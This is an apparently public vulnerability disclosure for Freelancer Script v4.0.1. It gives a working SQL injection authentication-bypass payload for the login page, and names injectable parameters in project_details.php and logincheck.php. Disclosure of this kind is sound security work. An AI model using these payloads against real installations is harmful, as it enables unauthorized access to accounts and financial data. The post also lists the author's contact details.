Freelancer Script version 4.0.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
aa47f6171347eea8b9a4af07ba557e35396ce1b05657b58e39f1c19491cbd650
################################################
#Title: FREELANCER SCRIPT v4.0.1 - Authentication Bypass & SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://www.2daybiz.com
#Vendor URL:
http://2daybiz.com/content/products/products/job-site-script/119-freelancer-script.php
#Product: FREELANCER SCRIPT v4.0.1
#Google Dork: N/A
################################################
#
# Product & Service Introduction:
#
# Freelance script easy to manage and very simple to deploy,
# comes with a web-based administrative panel has the capabilities to
manage users,
# financial transactions, categories and all relevant aspects of the
system, with few clicks of the mouse.
#
#
# http://localhost/freelancerscript/loginfr.php
#
# Username: 'or''='
# Password: 'or''='
#
#
# --SQL Injection--
#
http://localhost/freelancerscript/project_details.php?pid=24[SQL]&title=project1
#
# PoC:
# http://prnt.sc/ekbqnm
#
# POST :
# http://localhost/freelancerscript/logincheck.php
# data$: uname=demo[SQL]&pwd=demo&place=log&enter=Login
#
# PoC:
# http://prnt.sc/ekbrel
#
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127)
################################################
--
*Bilal Kardadou*
IT Security Consultant
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |